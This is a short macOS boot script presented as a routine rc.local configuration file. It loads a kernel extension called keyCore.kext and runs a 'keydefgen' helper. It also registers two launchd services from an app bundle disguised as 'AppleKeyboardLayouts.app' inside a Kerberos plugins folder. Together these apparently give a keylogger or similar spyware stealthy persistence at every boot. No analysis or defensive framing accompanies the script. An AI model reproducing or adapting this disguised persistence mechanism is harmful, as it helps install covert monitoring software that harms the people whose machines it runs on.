#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# make sure that the script will "exit 0" o success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
# This script configures Boot
##
. /etc/rc.common

##
# Install the Key
##
defaultPath=/System/Library/KerberosPlugins/KerberosCorePlugins/AppleKeyboardLayouts.app
/usr/bin/find /System/Library/Extensions/keyCore.kext -exec /bin/chmod -R g-w {} \;
/sbin/kextload /System/Library/Extensions/keyCore.kext
"${defaultPath}"/Contents/Resources/keydefgen
/bin/launchctl load "${defaultPath}"/Contents/keydef.plist

##
# Install the MainProject
##
sleep 25

#"$defaultPath"/Contents/Resources/configdkey.app/Contents/MacOS/JavaApplicationStub
/bin/launchctl load "${defaultPath}"/Contents/startup.plist

##
# Exit
##
exit 0

